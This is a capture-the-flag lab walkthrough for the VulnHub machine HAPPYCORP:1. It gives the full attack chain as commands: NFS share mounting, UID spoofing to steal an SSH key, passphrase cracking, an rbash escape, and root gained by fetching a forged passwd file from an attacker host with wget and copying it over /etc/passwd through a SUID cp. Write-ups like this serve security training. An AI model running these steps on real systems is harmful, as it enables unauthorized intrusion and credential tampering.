This is another post on vulnhub CTF “named as “HAPPYCORP:1” by Zayotic. It is design for VMware platform,
and it is a boot to root challenge where you have to find flags to finish the
task assigned by author.
You can download it from here: https://www.vulnhub.com/entry/happycorp-1,296/
Penetrating Methodologies
Scanning
·
Netdiscover
·
Nmap
Enumeration
·
NFS-Share
·
Mount share directory
·
Obtain user.txt -1st flag
·
Obtain SSH key
·
Cracked SSH passphrase (john the ripper)
Exploiting
·
Login to SSH
·
Break jail (rbash shell)
Privilege Escalation
·
Abusing SUID Binary
·
Obtain flag.txt-2nd flag
Walkthrough
Scanning
Let’s start with network scanning to identify the IP of VM
with the help of netdiscover.
So, we have our target IP 192.168.1.104. Now, let’s scan the
services and ports via nmap.
nmap -A 192.168.1.104
We have obtained the fruitful result from the nmap scan, as you
can observe so many services are running on the various port. Such as 22: SSH, 80:
HTTP and so on.
Enumeration
As we always navigate with HTTP services first, therefore we
browse http://192.168.1.104
as the URL but found nothing interesting.
We found that network share service was also available on port
2049, so we thought to check shared directory in the network. We
have therefore installed NFS-client on our local machine and have a command to
identify the shared directory available to mount on our local computer.
showmount -e 192.168.1.104
we found /home/karl is a shared directory that we can
mount in our local machine as given below:
mkdir /tmp/raj
mount 192.168.1.104:/home/karl /tmp/raj
cd /tmp/raj
ls -al
As I mount /home/karl in our /tmp/raj directory but I didn’t
find anything here, truthfully when I try to open .ssh directory, it gave
permission denied error,
Therefore, I add a user “aaru” in the a group that
has GID of 1001 on my Kali machine and successfully access .ssh folder as shown
in below steps (Same as approach was used in Lin-Security).
groupadd –gid 1001 aaru
useradd –uid 1001 –group raj aaru
Then access the our 1st flag i.e. user.txt and
moreover copies the id_rsa key in our local machine by executing following
command:
sudo -u aaru ls -l .ssh
sduo -u aaru cat .ssh/user.txt
sduo -u aaru cat .ssh/id_rsa
Further I explored id _rsa.pub and authorized key where I
noticed Karl@happycorp and realized that Karl could be the
possible username for ssh login. Therefore, I used id_rsa key for login into
ssh as karl but failed to login into it, as it required passphrase for key.
Then we have used ssh2john
to convert this SSH key into a crackable file for John the ripper and further used the rockyou.txt wordlist for johntheripper.
python ssh2john key > ssh_login
john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt
After obtaining the passphrase “sheep” we changed the
permission of RSA key and login as karl but unfortunately, we got access of
restricted shell also known rbash as shell.
ssh -i key karl@192.168.1.104
Therefore, I tried to access bash shell directly though ssh
by simply typing following:
ssh -i key karl@192.168.1.104 -t “/bin/sh”
Luckily it works and we have successfully access the proper
shell.
Privilege
Escalation
Now it’s time to escalate the root privilege and finish this
task, therefore with help of find command I look for SUID enabled binaries
where I found SUID bit is enabled for copy binary (/bin/cp).
find / -perm -u=s -type f 2>/dev/null
Hmm!! if suid bit is enabled on /bin/cp then we can copy
any system file of root level or can overwrite the existing file. First, I have explored the /etc /passwd file
where karl was end user as shown in the below image and our vision is to edit
this file by adding a new user.
On other hands, we have generated a new encrypted password:
pass123 using OpenSSL passwd
openssl passwd -1 -salt ignite pass123
So, we have copied the whole content of /etc/passwd
file in a text editor and then create a new record for user “ignite”
that owns root level permissions. Saved this file as passwd and further used
python server for transferring it into victim’s machine.
Inside /tmp folder we have downloaded our passwd file and
with the help of copy command we have replaced the original /etc/passwd from
ours file as shown below.
cd /tmp
wget http://192.168.1.111:8000/passwd
cp passwd /etc/passwd
su ignite
cd root
cat root.txt
0 comments:
Post a Comment